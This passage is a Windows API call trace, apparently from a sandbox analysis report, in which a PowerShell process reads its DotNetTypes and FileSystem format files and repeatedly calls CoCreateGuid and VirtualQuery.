lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.452] SetErrorMode (uMode=0x1) returned 0x1 [0062.452] SetErrorMode (uMode=0x1) returned 0x1 [0062.452] GetFileType (hFile=0x308) returned 0x1 [0062.452] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.454] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.455] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.455] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.456] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.456] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.456] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.456] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.457] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.457] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.457] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.457] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.458] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.458] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.458] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.458] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.460] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.460] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0xbce, lpOverlapped=0x0) returned 1 [0062.460] ReadFile (in: hFile=0x308, lpBuffer=0x35e2f76, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e2f76*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.460] ReadFile (in: hFile=0x308, lpBuffer=0x35e3840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x35e3840*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.460] CloseHandle (hObject=0x308) returned 1 [0062.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.460] SetErrorMode (uMode=0x1) returned 0x1 [0062.460] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0062.461] SetErrorMode (uMode=0x1) returned 0x1 [0062.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.461] CoTaskMemFree (pv=0x1574e0) [0062.461] RegCloseKey (hKey=0x308) returned 0x0 [0062.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.464] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x443c8652, Data2=0x1ca4, Data3=0x4c3c, Data4=([0]=0x81, [1]=0xf7, [2]=0x11, [3]=0xa4, [4]=0x64, [5]=0x79, [6]=0xea, [7]=0x72))) returned 0x0 [0062.465] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7ded3e78, Data2=0xa326, Data3=0x4fcc, Data4=([0]=0x84, [1]=0x3, [2]=0x40, [3]=0x14, [4]=0x81, [5]=0x58, [6]=0xdc, [7]=0xbe))) returned 0x0 [0062.465] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x82a2a3b8, Data2=0xbb0f, Data3=0x418b, Data4=([0]=0xa6, [1]=0x37, [2]=0x3e, [3]=0xbb, [4]=0x93, [5]=0x7, [6]=0x4a, [7]=0xc6))) returned 0x0 [0062.466] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf80b604a, Data2=0xe921, Data3=0x48e8, Data4=([0]=0xac, [1]=0x99, [2]=0xc4, [3]=0xac, [4]=0x14, [5]=0x1c, [6]=0x46, [7]=0xc8))) returned 0x0 [0062.466] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5334d496, Data2=0x627f, Data3=0x48b7, Data4=([0]=0x9f, [1]=0x6f, [2]=0xbd, [3]=0x5e, [4]=0x41, [5]=0xf2, [6]=0x64, [7]=0xbb))) returned 0x0 [0062.467] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xcd463c6d, Data2=0x4435, Data3=0x4ae7, Data4=([0]=0x9d, [1]=0x45, [2]=0xb2, [3]=0x51, [4]=0xf4, [5]=0xfe, [6]=0x99, [7]=0xeb))) returned 0x0 [0062.467] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.468] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc9307c1d, Data2=0xbcf, Data3=0x4386, Data4=([0]=0xb7, [1]=0xe6, [2]=0xd6, [3]=0x19, [4]=0x64, [5]=0x7f, [6]=0x3b, [7]=0x50))) returned 0x0 [0062.468] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.469] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.471] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xf6c4f4da, Data2=0xda32, Data3=0x4cf2, Data4=([0]=0xbc, [1]=0xdf, [2]=0x6a, [3]=0x5c, [4]=0xa1, [5]=0xdc, [6]=0x38, [7]=0xfd))) returned 0x0 [0062.471] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x12c3100a, Data2=0x6d7c, Data3=0x420c, Data4=([0]=0x90, [1]=0x59, [2]=0x15, [3]=0x8b, [4]=0x27, [5]=0x84, [6]=0xf0, [7]=0x9))) returned 0x0 [0062.471] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9b87869b, Data2=0x8599, Data3=0x49de, Data4=([0]=0xba, [1]=0x21, [2]=0x9c, [3]=0x8d, [4]=0xfb, [5]=0xe, [6]=0x12, [7]=0xcf))) returned 0x0 [0062.472] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa8f6adcd, Data2=0xcb47, Data3=0x4190, Data4=([0]=0xac, [1]=0x1b, [2]=0x0, [3]=0xf, [4]=0xa4, [5]=0xa, [6]=0xb2, [7]=0xd7))) returned 0x0 [0062.472] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.472] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x87369e7d, Data2=0xf5be, Data3=0x4e87, Data4=([0]=0x83, [1]=0xc2, [2]=0x3d, [3]=0x28, [4]=0xda, [5]=0x75, [6]=0x43, [7]=0xac))) returned 0x0 [0062.473] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.473] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.474] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.474] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.475] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.476] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9cd8e688, Data2=0xc9b9, Data3=0x43ff, Data4=([0]=0xab, [1]=0x80, [2]=0xdb, [3]=0x85, [4]=0x7d, [5]=0xa9, [6]=0x20, [7]=0xe6))) returned 0x0 [0062.476] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x37d8e6d9, Data2=0x3a0c, Data3=0x4fff, Data4=([0]=0x81, [1]=0x6d, [2]=0x4b, [3]=0xeb, [4]=0x71, [5]=0x40, [6]=0x1f, [7]=0xef))) returned 0x0 [0062.476] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xea5e657f, Data2=0xb4cd, Data3=0x4cd4, Data4=([0]=0xbc, [1]=0x82, [2]=0xa6, [3]=0x87, [4]=0xeb, [5]=0x2b, [6]=0x35, [7]=0xbc))) returned 0x0 [0062.477] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x87dc4098, Data2=0xeec6, Data3=0x4402, Data4=([0]=0xa9, [1]=0xea, [2]=0xe5, [3]=0x32, [4]=0xe6, [5]=0x0, [6]=0x5b, [7]=0xc1))) returned 0x0 [0062.477] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x6b8f45ec, Data2=0xab12, Data3=0x4eba, Data4=([0]=0x92, [1]=0xf2, [2]=0x3f, [3]=0x35, [4]=0x40, [5]=0xa9, [6]=0xc3, [7]=0x2))) returned 0x0 [0062.477] VirtualQuery (in: lpAddress=0x24c160, lpBuffer=0x24d020, dwLength=0x30 | out: lpBuffer=0x24d020*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.478] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x48d02811, Data2=0xdad6, Data3=0x4bd4, Data4=([0]=0x80, [1]=0x6f, [2]=0xb2, [3]=0x59, [4]=0xc5, [5]=0xf1, [6]=0x8a, [7]=0xe6))) returned 0x0 [0062.478] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8a5d8614, Data2=0xae78, Data3=0x4907, Data4=([0]=0xbd, [1]=0xa, [2]=0x8d, [3]=0xc8, [4]=0xfd, [5]=0x30, [6]=0x3b, [7]=0x25))) returned 0x0 [0062.479] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x271ca5f5, Data2=0x21a9, Data3=0x4393, Data4=([0]=0x9c, [1]=0x2c, [2]=0x63, [3]=0x68, [4]=0x26, [5]=0x59, [6]=0xe7, [7]=0x15))) returned 0x0 [0062.479] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x494e265c, Data2=0xc8db, Data3=0x4e0e, Data4=([0]=0x83, [1]=0xe7, [2]=0xf6, [3]=0x6a, [4]=0x38, [5]=0xe1, [6]=0x8f, [7]=0xdc))) returned 0x0 [0062.479] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x9317d74f, Data2=0x79c0, Data3=0x4f16, Data4=([0]=0x8a, [1]=0x75, [2]=0xa9, [3]=0xc8, [4]=0x33, [5]=0xd9, [6]=0x38, [7]=0x4))) returned 0x0 [0062.480] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x53e6d83d, Data2=0x1148, Data3=0x4717, Data4=([0]=0x94, [1]=0x37, [2]=0x88, [3]=0xcd, [4]=0xba, [5]=0x62, [6]=0x25, [7]=0xcd))) returned 0x0 [0062.480] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa8bcf979, Data2=0x5b7c, Data3=0x482f, Data4=([0]=0xb2, [1]=0x40, [2]=0x6f, [3]=0x90, [4]=0x19, [5]=0xb8, [6]=0x6c, [7]=0x57))) returned 0x0 [0062.480] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x63cf9ee9, Data2=0xb8c7, Data3=0x4ec4, Data4=([0]=0x9e, [1]=0x91, [2]=0x8d, [3]=0x44, [4]=0xd6, [5]=0xdc, [6]=0x39, [7]=0xde))) returned 0x0 [0062.481] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xce19e8e8, Data2=0x2fb6, Data3=0x48d4, Data4=([0]=0xbb, [1]=0x1, [2]=0x1c, [3]=0xd4, [4]=0xe, [5]=0x2b, [6]=0x26, [7]=0x7e))) returned 0x0 [0062.481] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x12bc6c95, Data2=0x3a1d, Data3=0x4891, Data4=([0]=0xa1, [1]=0xaf, [2]=0xa5, [3]=0x68, [4]=0x84, [5]=0xd2, [6]=0xce, [7]=0xc8))) returned 0x0 [0062.482] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x625962c5, Data2=0xdd3b, Data3=0x46a1, Data4=([0]=0xa0, [1]=0xca, [2]=0x63, [3]=0x7e, [4]=0x18, [5]=0xf4, [6]=0x5d, [7]=0x84))) returned 0x0 [0062.482] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x739cd6bf, Data2=0x8795, Data3=0x47bb, Data4=([0]=0xa2, [1]=0x2c, [2]=0xee, [3]=0x9a, [4]=0x9b, [5]=0xe2, [6]=0x5b, [7]=0xe7))) returned 0x0 [0062.482] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x23862b9c, Data2=0xa684, Data3=0x4e6e, Data4=([0]=0x88, [1]=0x50, [2]=0x17, [3]=0xdc, [4]=0x2a, [5]=0x9d, [6]=0x80, [7]=0xca))) returned 0x0 [0062.483] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xc63b9859, Data2=0xa16c, Data3=0x49bb, Data4=([0]=0xa2, [1]=0xed, [2]=0xa8, [3]=0x90, [4]=0x13, [5]=0x8e, [6]=0x27, [7]=0x78))) returned 0x0 [0062.483] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x2f37861a, Data2=0xabbd, Data3=0x4a8a, Data4=([0]=0xba, [1]=0x9d, [2]=0x83, [3]=0x39, [4]=0x28, [5]=0x1b, [6]=0x7e, [7]=0x3c))) returned 0x0 [0062.483] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x684eec7, Data2=0xc42a, Data3=0x4d1b, Data4=([0]=0x8a, [1]=0x27, [2]=0x9c, [3]=0xc4, [4]=0xc7, [5]=0x97, [6]=0x4d, [7]=0xc2))) returned 0x0 [0062.484] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x44995e56, Data2=0x7632, Data3=0x498c, Data4=([0]=0x97, [1]=0x18, [2]=0xc5, [3]=0xf9, [4]=0x91, [5]=0x29, [6]=0xdc, [7]=0x22))) returned 0x0 [0062.484] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa61c84de, Data2=0x8c2c, Data3=0x4f56, Data4=([0]=0x8a, [1]=0x37, [2]=0x53, [3]=0x2c, [4]=0x58, [5]=0x7e, [6]=0xa9, [7]=0x21))) returned 0x0 [0062.484] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xe0e31fee, Data2=0xdee7, Data3=0x488e, Data4=([0]=0x91, [1]=0x68, [2]=0x6f, [3]=0xe3, [4]=0xdf, [5]=0x6f, [6]=0x5d, [7]=0x2c))) returned 0x0 [0062.485] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.485] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.487] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.490] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xceea21e1, Data2=0x9172, Data3=0x4098, Data4=([0]=0xb7, [1]=0x79, [2]=0x6e, [3]=0x4c, [4]=0x6a, [5]=0xf9, [6]=0x4, [7]=0x8b))) returned 0x0 [0062.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0062.490] SetErrorMode (uMode=0x1) returned 0x1 [0062.490] SetErrorMode (uMode=0x1) returned 0x1 [0062.490] GetFileType (hFile=0x308) returned 0x1 [0062.491] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.499] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.500] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.500] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.501] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.501] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.501] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x119, lpOverlapped=0x0) returned 1 [0062.501] ReadFile (in: hFile=0x308, lpBuffer=0x36f3e28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x36f3e28*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.501] CloseHandle (hObject=0x308) returned 1 [0062.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0062.501] SetErrorMode (uMode=0x1) returned 0x1 [0062.501] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0062.501] SetErrorMode (uMode=0x1) returned 0x1 [0062.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0062.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0062.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", 